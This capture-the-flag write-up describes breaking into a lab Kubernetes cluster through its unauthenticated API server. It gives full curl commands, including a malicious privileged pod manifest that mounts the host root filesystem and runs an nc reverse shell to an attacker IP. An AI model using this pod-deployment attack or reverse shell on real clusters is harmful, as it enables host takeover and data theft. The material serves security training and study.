# Introduction

The entrypoint was just an IP address. For us, it was 10.129.95.171.
It was supposed to be the address of a Kubernetes cluster.

# Recon

An `nmap` scan gives us the following open TCP ports:

- 22/tcp
- 2379/tcp
- 2380/tcp
- 8443/tcp
- 10249/tcp
- 10250/tcp
- 10256/tcp
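
For reference, a full-range scan along these lines reproduces that list; the exact flags are an assumption, not the original command:

```bash
# Full TCP port scan with service detection; the original invocation
# was not recorded, so these flags are a plausible reconstruction.
nmap -p- -sV -oN nmap-full.txt 10.129.95.171
```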

We recognize the classic TCP ports of a Kubernetes environment:
- 10250: kubelet API (direct access to the nodes)
- 10249, 10256: kube-proxy (metrics and health check)
- 2379, 2380: etcd (the cluster's key/value store; client and peer traffic)

By default the Kubernetes API server listens on TCP port 6443, but for this challenge it is exposed on port 8443. Its `/version` endpoint returns version information about the Kubernetes environment, as shown below.
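
A sketch of the query (`-k` skips TLS verification, since the API server presents a self-signed certificate):

```bash
# Returns a small JSON document with fields such as "major", "minor"
# and "gitVersion".
curl -sk https://10.129.95.171:8443/version
```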

# Analysis

In Kubernetes, there are `resources`, identified by type (`pod`, `configmap`, `secret`, ...), which an authenticated or unauthenticated user may be allowed to list, create, update, and/or delete, depending on RBAC. Kubernetes also has a system of `namespaces` to separate environments.
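
On the REST side, namespaced core (`v1`) resources map to predictable URL paths; this is the pattern used throughout this writeup. For example, listing configmaps in the `default` namespace:

```bash
# Path pattern: /api/v1/namespaces/<namespace>/<resource>[/<name>]
curl -sk https://10.129.172.188:8443/api/v1/namespaces/default/configmaps/
```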

Kubernetes has four default namespaces:

- `default`
- `kube-node-lease`
- `kube-public`
- `kube-system`
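
The namespaces themselves can be enumerated anonymously too; a sketch, assuming `jq` is installed locally:

```bash
# List namespace names only.
curl -sk https://10.129.172.188:8443/api/v1/namespaces \
  | jq -r '.items[].metadata.name'
```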

It is particularly interesting to access or manipulate resources inside the `kube-system` namespace, because that is where the control-plane components live: success there can lead to sensitive data leaks or cluster breakage.

After probing which resources are accessible without authentication, two stand out: `secret` and `pod`. `secret` to retrieve, for example, access tokens to other resources; `pod` to, for example, deploy a new pod into the namespace.
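
A quick probe shows which of the two is readable anonymously; the secrets listing is the one RBAC is most likely to still block:

```bash
# A 200 with a SecretList body means anonymous reads are allowed; a
# 403 "secrets is forbidden" error means RBAC blocks this resource.
curl -sk \
  -H 'Accept: application/json' \
  https://10.129.172.188:8443/api/v1/namespaces/kube-system/secrets/
```

The `pod` listing, in any case, is fruitful: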

```bash
curl -k \
  -X GET \
  -H 'Accept: application/json' \
  https://10.129.172.188:8443/api/v1/namespaces/kube-system/pods/
```

This returns the list of pods. That is problematic: unauthenticated users should not have access to this information.

Extract:

```json
{
  "kind": "PodList",
  "apiVersion": "v1",
  "metadata": {
    "resourceVersion": "99232"
  },
  "items": [
    {
      "metadata": {
        "name": "alpine",
        "namespace": "kube-system",
        "uid": "29eb87f5-305c-4f20-b668-469d79200118",
        "resourceVersion": "98964",
        "creationTimestamp": "2021-07-21T20:32:48Z",
        "managedFields": [
          (...)
      },
      "spec": {
        "volumes": [
          {
            "name": "mount-root-into-mnt",
            "hostPath": {
              "path": "/",
              "type": ""
            }
          }
          (...)
        "containerStatuses": [
          {
            "name": "alpine",
            "state": {
              "waiting": {
                "reason": "ImagePullBackOff",
                "message": "Back-off pulling image \"alpine\""
              }
            },
            "lastState": {
              "terminated": {
                "exitCode": 137,
                "reason": "Error",
                "startedAt": "2021-07-21T20:32:51Z",
                "finishedAt": "2021-07-21T20:33:52Z",
                "containerID": "docker://c80ad77181ccd49c64c177eef8c459e6c4b27fc5ff06f74ce4ffb22540cb2823"
              }
            },
            "ready": false,
            "restartCount": 0,
            "image": "alpine:latest",
            "imageID": "docker-pullable://alpine@sha256:234cb88d3020898631af0ccbbcca9a66ae7306ecd30c9720690858c1b007d2a0",
            "containerID": "docker://c80ad77181ccd49c64c177eef8c459e6c4b27fc5ff06f74ce4ffb22540cb2823",
            "started": false
          }
        ],
        "qosClass": "BestEffort"
      }
    },
    (...)
    {
      "metadata": {
        "name": "kube-apiserver-kube",
        "namespace": "kube-system",
        "uid": "3a6c1104-409c-40ca-97e3-ecbea533f1ea",
        "resourceVersion": "94732",
        "creationTimestamp": "2021-07-24T08:55:50Z",
        "labels": {
          "component": "kube-apiserver",
          "tier": "control-plane"
        },
        "annotations": {
          "kubeadm.kubernetes.io/kube-apiserver.advertise-address.endpoint": "10.129.172.188:8443",
          "kubernetes.io/config.hash": "c132183c5af205ba7fc881492a31db77",
          "kubernetes.io/config.mirror": "c132183c5af205ba7fc881492a31db77",
          "kubernetes.io/config.seen": "2021-07-24T04:55:34.703087177-04:00",
          "kubernetes.io/config.source": "file"
        },
        "ownerReferences": [
          {
            "apiVersion": "v1",
            "kind": "Node",
            "name": "kube",
            "uid": "a8d9a8e7-ee8e-4596-8c2d-32d5a6e3ea21",
            "controller": true
          }
        ],
        (...)
        "containers": [
          {
            "name": "kube-apiserver",
            "image": "k8s.gcr.io/kube-apiserver:v1.21.2",
            "command": [
              "kube-apiserver",
              "--advertise-address=10.129.172.188",
              "--allow-privileged=true",
              "--anonymous-auth=true",
              "--authorization-mode=Node,RBAC",
              "--client-ca-file=/var/lib/minikube/certs/ca.crt",
              "--enable-admission-plugins=NamespaceLifecycle,LimitRanger,ServiceAccount,DefaultStorageClass,DefaultTolerationSeconds,NodeRestriction,MutatingAdmissionWebhook,ValidatingAdmissionWebhook,ResourceQuota",
              "--enable-bootstrap-token-auth=true",
              "--etcd-cafile=/var/lib/minikube/certs/etcd/ca.crt",
              "--etcd-certfile=/var/lib/minikube/certs/apiserver-etcd-client.crt",
              "--etcd-keyfile=/var/lib/minikube/certs/apiserver-etcd-client.key",
              "--etcd-servers=https://127.0.0.1:2379",
              "--insecure-port=0",
              "--kubelet-client-certificate=/var/lib/minikube/certs/apiserver-kubelet-client.crt",
              "--kubelet-client-key=/var/lib/minikube/certs/apiserver-kubelet-client.key",
              "--kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname",
              "--proxy-client-cert-file=/var/lib/minikube/certs/front-proxy-client.crt",
              "--proxy-client-key-file=/var/lib/minikube/certs/front-proxy-client.key",
              "--requestheader-allowed-names=front-proxy-client",
              "--requestheader-client-ca-file=/var/lib/minikube/certs/front-proxy-ca.crt",
              "--requestheader-extra-headers-prefix=X-Remote-Extra-",
              "--requestheader-group-headers=X-Remote-Group",
              "--requestheader-username-headers=X-Remote-User",
              "--secure-port=8443",
              "--service-account-issuer=https://kubernetes.default.svc.cluster.local",
              "--service-account-key-file=/var/lib/minikube/certs/sa.pub",
              "--service-account-signing-key-file=/var/lib/minikube/certs/sa.key",
              "--service-cluster-ip-range=10.96.0.0/12",
              "--tls-cert-file=/var/lib/minikube/certs/apiserver.crt",
              "--tls-private-key-file=/var/lib/minikube/certs/apiserver.key"
            ],
            "resources": {
              "requests": {
                "cpu": "250m"
              }
            },
            (...)
```
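
The full `PodList` is verbose; a small `jq` filter (my addition, assuming `jq` is installed locally) makes it easier to scan:

```bash
# Print each pod's name and container image(s) from the listing.
curl -sk https://10.129.172.188:8443/api/v1/namespaces/kube-system/pods/ \
  | jq -r '.items[] | "\(.metadata.name)\t\(.spec.containers[].image)"'
```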

# Pod deployment exploit

Many exploit methods exist; there are probably others besides the one I tried for this challenge. Two flags in the `kube-apiserver` command above already tell us a lot: `--anonymous-auth=true` is why our unauthenticated requests are accepted at all, and `--allow-privileged=true` means the API server will happily schedule privileged pods.

I try to deploy a new pod in the namespace with system privileges.

The problem I encountered is that the cluster does not seem to have access to every Docker registry (a kind of restricted Minikube registry, but smaller?). So I reuse a known image I can easily exploit: I see an `alpine` image in the pods list, and it makes a great starting point:

```json
"image": "alpine:latest",
"imageID": "docker-pullable://alpine@sha256:234cb88d3020898631af0ccbbcca9a66ae7306ecd30c9720690858c1b007d2a0",
"containerID": "docker://c80ad77181ccd49c64c177eef8c459e6c4b27fc5ff06f74ce4ffb22540cb2823",
```

I build a malicious pod configuration:

```json
{
  "apiVersion": "v1",
  "kind": "Pod",
  "metadata": {
    "name": "malicious"
  },
  "spec": {
    "containers": [{
      "name": "malicious-container",
      "image": "alpine@sha256:234cb88d3020898631af0ccbbcca9a66ae7306ecd30c9720690858c1b007d2a0",
      "command": ["sh"],
      "args": ["-c", "nc 10.10.14.192 4444 -e /bin/sh"],
      "securityContext": {
        "privileged": true
      },
      "volumeMounts": [{
        "name": "noderoot",
        "mountPath": "/mnt"
      }]
    }],
    "serviceAccountName": "default",
    "automountServiceAccountToken": true,
    "hostNetwork": true,
    "volumes": [{
      "name": "noderoot",
      "hostPath": {
        "path": "/"
      }
    }]
  }
}
```

In this manifest:

- `privileged: true`: adds all capabilities, including those needed to interact with the host system.
- `volumes` + `volumeMounts`: mount the host's `/` into the container at `/mnt` (the volume must be both declared at the pod level and mounted in the container).
- `args`: executes `nc` at startup to open a reverse shell. NB: `nc` is available by default in `alpine` images (as a BusyBox applet)!

So, first, start a listener on my machine: `nc -nlvp 4444`.

Then, run the deployment:

```bash
curl -k \
  -X POST \
  -H 'Accept: application/json' \
  -H 'Content-Type: application/json' \
  https://10.129.172.188:8443/api/v1/namespaces/kube-system/pods/ \
  --data-binary "@/path/to/malicious-pod.json"
```

And we got a shell!
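
Had the image pull failed again (remember the `ImagePullBackOff` on the pre-existing `alpine` pod), the pod's status would have shown why; it is readable through the same unauthenticated API:

```bash
# Inspect the container state of our pod (running vs. waiting reason).
curl -sk https://10.129.172.188:8443/api/v1/namespaces/kube-system/pods/malicious \
  | jq '.status.containerStatuses[].state'
```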

Fine, now we can simply navigate the mounted host filesystem (under `/mnt`) from inside the container and search for the flag file, along the lines sketched below (I did not keep the flag, so I cannot publish it here). Done!
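
A minimal search, where the flag's exact name and location are assumptions:

```bash
# Run inside the reverse shell; the node's root is mounted at /mnt.
# The flag filename is a guess typical of this kind of challenge.
find /mnt/root /mnt/home -maxdepth 3 -iname '*flag*' 2>/dev/null
cat /mnt/root/flag.txt
```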